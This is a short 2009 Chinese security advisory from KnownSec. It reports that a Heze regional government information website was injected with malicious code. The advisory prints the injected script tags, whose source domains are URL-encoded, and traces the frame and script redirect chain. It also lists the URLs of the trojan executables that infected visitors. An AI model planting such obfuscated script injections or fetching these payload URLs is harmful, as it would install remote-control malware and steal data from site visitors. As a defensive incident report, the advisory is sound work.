发布时间:Sun May 24 2009 22:11:21 UTC+0800
最后更新时间:Sun May 24 2009 22:11:21 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 菏泽红盾信息网(http://www.hz-redshield.com.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://www.hz-redshield.com.cn/
网页被嵌入恶意链接代码:
<script src=http://%6D%62%72%33%2E%63%6E></script>
<script src=http://%77%76%67%32%2E%63%6E></script>
<script src=http://%31%31%37%6C%61%2E%63%6E></script>
挂马分析:
[wide]http://www.hz-redshield.com.cn/
[script]http://%6d%62%72%33%2e%63%6e
[frame]http://26c26.3322.org/a/a6a.htm?08
[frame]http://26c26.3322.org/a/163.htm
[frame]http://26c26.3322.org/a/ggqm.htm
[script]http://26c26.3322.org/a/js.js
[frame]http://26c26.3322.org/a/gg14.htm
[frame]http://26c26.3322.org/a/ggfl.htm
[frame]http://26c26.3322.org/a/ggff.htm
[frame]http://26c26.3322.org/a/ggvod.htm
[frame]http://26c26.3322.org/a/z.htm
[frame]http://26c26.3322.org/a/e.htm
[frame]http://26c26.3322.org/a/ggbb.htm
[frame]http://26c26.3322.org/a/ggr.htm
[script]http://js.tongji.cn.yahoo.com/1106391/ystat.js
[script]http://s37.cnzz.com/stat.php?id=1408289&web_id=1408289
[script]http://%77%76%67%32%2e%63%6e
[script]http://%31%31%37%6c%61%2e%63%6e
[script]http://%77%76%67%32%2e%63%6e
最终下载病毒文件:
http://li3bn.3322.org/web/activex.exe
http://exe316.com/web/xp.exe
通过执行以上病毒文件,来达到完全控制访问者的系统。
知道创宇:专业的WEB安全公司 www.knownsec.com
Popularity: 3% [?]
